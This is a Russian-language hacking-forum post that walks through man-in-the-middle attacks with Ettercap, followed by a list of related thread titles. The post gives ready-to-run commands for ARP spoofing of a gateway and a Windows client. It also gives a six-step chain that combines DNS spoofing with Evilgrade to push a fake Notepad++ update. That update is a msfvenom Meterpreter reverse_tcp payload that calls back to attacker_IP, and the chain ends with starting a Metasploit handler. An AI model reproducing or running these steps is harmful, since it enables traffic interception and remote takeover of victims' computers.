«Атаки класса man-in- the-middle с помощью Ettercap, »

B

Bad-Dag

Здравствуйте, в этой статье мы познакомимся с такими инструментом как: Ettercap,

Ettercap – сниффер и не только

Еttercap — инструмент для анализа безопасности компьютерной сети, обладающий большим количеством
разнообразных возможностей, но ставший особо популярным за умение выполнять атаку ARP-spoofing.

Так же, умеет анализировать трафик и извлекать пароли различных протоколов - от http и ftp до imap и nfs.
Может работать в трех режимах — консольном/текстовом (-T), псевдографике/ncurses (-C) или в графическом
варианте (-G).


Пример проведения атаки типа ARP spoofing c использованием Ettercap:


ettercap -T -q -M arp:remote -L log /IP_gateway/ /IP_windowsClient/


DNS Spoofing с использованием Ettercap и дальнейшая эксплуатация жертвы с помощью фреймворка Evilgrade


1) Вначале необходимо проверить и внести правки в файл выбранного модуля Evilgrade
nano /usr/share/isr-evilgrade/modules/notepadplus.pm


2) Добавить необходимую A-запись в модуль Ettercap, отвечающий за атаку типа dns spoofing
nano /etc/ettercap/etter.dns


3) Создать пейлоад, используя возможности фреймворка metasploit
msfvenom -p windows/meterpreter/reverse_tcp LHOST=attacker_IP LPORT=8765 -f exe > /tmp/agent.exe


4) Запустить слушатель, готовый принимать подключения от пейлоада
msfconsole -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST attacker_IP;
set LPORT 8765; exploit -j"


5) Сконфигурировать и запустить Evilgrade
evilgrade> configure notepadplus
evilgrade> show options
evilgrade> set agent /tmp/agent.exe
evilgrade> start


6) Последний шаг — запуск атаки dns spoofing с помощью ettercap
ettercap -T -q -M arp:remote -P dns_spoof /IP_gateway// /IP_windowsClient//

Всем спасибо за внимание.
 
Похожие темы
B Атаки класса man-in- the-middle часть 3 с помощью MITMf Уязвимости и взлом 0
B Атаки класса man-in- the-middle часть 2 с помощью Responder Уязвимости и взлом 0
Admin Интересно Создан ИИ-червь, который распространяется самостоятельно и выбирает цели для атаки. Новости в сети 0
Admin Интересно Китайская хакерская группа TA4922 расширяет фишинговые атаки на Европу и Южную Африку. Новости в сети 0
Admin Интересно Сокращение поверхности атаки IAM через платформы видимости и интеллекта идентификации. Новости в сети 0
Admin Интересно Срочно меняйте ключи: Red Hat оказалась в центре атаки на цепочку поставок через npm. Новости в сети 0
Admin Интересно Мошенники используют новую схему двойной атаки на игроков. Новости в сети 0
Admin Интересно Вредоносное ПО обнаружено в пакетах Laravel-Lang после атаки на Git. Новости в сети 0
Admin Интересно Образовательная платформа временно отключилась из-за атаки вымогателей. Новости в сети 0
Admin Интересно Криптоплатформа THORChain приостановила работу сети после атаки на хранилище. Новости в сети 0
Admin Интересно Хакеры установили новый рекорд скорости атаки на нейросети. Новости в сети 0
Admin Интересно Держите криптовалюту в Transit Finance? Проверьте кошельки после атаки на сеть TRON. Новости в сети 0
Admin Интересно Группировка FrostyNeighbor продолжает атаки на правительственные организации Украины. Новости в сети 0
Admin Интересно OpenAI подтвердила компрометацию двух устройств в результате атаки на цепочку поставок TanStack. Новости в сети 0
Admin Интересно Конгресс США требует объяснений от Instructure после двойной атаки на платформу Canvas. Новости в сети 0
Admin Интересно Иранские хакеры маскируют шпионские операции под атаки с вымогательским ПО. Новости в сети 0
Admin Интересно Хакер Digit признал вину в США за атаки на нефтегазовую инфраструктуру. Новости в сети 0
Admin Интересно Ubuntu недоступен более 12 часов из-за DDoS-атаки. Хакеры требуют переговоров с Canonical. Новости в сети 0
Admin Интересно Атаки на больницы и взлом электростанций: нейросеть Mythos вышла из-под контроля. Новости в сети 0
Admin Интересно Bitwarden CLI стал жертвой атаки на цепочку поставок. Новости в сети 0
Admin Интересно Голландский форум для любителей лошадей стал жертвой хакерской атаки. Новости в сети 0
Admin Интересно Энергетический сектор Венесуэлы стал целью разрушительной атаки с использованием Lotus Wiper. Новости в сети 0
Admin Интересно В системе IntraService обнаружены уязвимости, упрощающие фишинговые атаки. Новости в сети 0
Admin Интересно Криптобиржа Grinex приостановила работу после хакерской атаки на $13,74 млн. Новости в сети 0
Admin Интересно Хакеры Triad Nexus усилили атаки, используя облачные сервисы. Новости в сети 0
Admin Интересно Мошенники используют фишинговые атаки для кражи банковских данных. Новости в сети 0
Admin Интересно Плагин для Visual Studio Code стал инструментом атаки на разработчиков криптовалют. Новости в сети 0
Admin Интересно Российский хакер приговорён к двум годам тюрьмы за управление ботнетом и атаки вымогателей. Новости в сети 0
Admin Интересно Исследователи обнаружили механизм MITM-атаки в популярном клиенте Telegram — Telega. Новости в сети 0
Admin Интересно Еженедельный обзор: уязвимости, атаки на CI/CD и новые угрозы. Новости в сети 0
Admin Интересно CISA предупреждает о рисках использования Microsoft Intune после атаки на Stryker. Новости в сети 0
Admin Интересно Министерство юстиции США остановило работу ботнетов, ответственных за крупнейшие DDoS-атаки. Новости в сети 0
Admin Интересно Компания Aura, специализирующаяся на защите от мошенничества, стала жертвой атаки. Новости в сети 0
Admin Интересно Клиенты Nordstrom стали жертвами фишинговой атаки в честь Дня Святого Патрика. Новости в сети 0
Admin Интересно Обнаружен новый вариант атаки ClickFix. Новости в сети 0
Admin Интересно Еженедельный обзор кибербезопасности: уязвимости Qualcomm, iOS и новые атаки. Новости в сети 0
Admin Интересно Иран использовал ракету Khyber для атаки на Израиль, создав сложности для ПВО. Новости в сети 0
Admin Интересно Еженедельный обзор кибербезопасности: уязвимости, атаки и новые угрозы. Новости в сети 0
Admin Интересно Киберугрозы февраля 2026: взломы, ИИ и атаки на банкоматы. Новости в сети 0
Admin Статья Атаки на беспроводные сети. Жирная статья Уязвимости и взлом 0
Admin Интересно DynoWiper против польского света. Рассказываем историю самой мощной хакерской атаки на инфраструктуру страны за последние годы. Новости в сети 0
Admin Статья Инструкция Layer4 DDOS атаки. Уязвимости и взлом 0
Admin Интересно У Китая всё по плану: сначала военные учения, следом – DDoS-атаки. Новости в сети 0
Admin Статья SQL-инъекции: Анатомия атаки и искусство защиты через Prepared Statements Уязвимости и взлом 0
Support81 Этичный хакинг? Забудьте. США готовят рои ИИ-агентов для атаки на Китай Новости в сети 0
Support81 Один взлом — минус ВВП: убытки после атаки на JLR стали главной причиной замедления экономиики Великобритании Новости в сети 0
wrangler65 Атаки на беспроводные сети Уязвимости и взлом 0
Support81 Ты просто навёл мышку — и потерял всё. Разбор атаки RenderShock Новости в сети 0
Support81 ИИ-атаки на подъёме: почему 2024 год стал переломным для кибербезопасности Новости в сети 0
Support81 37 команд для атаки: что скрывает новый бэкдор FINALDRAFT Новости в сети 0

Название темы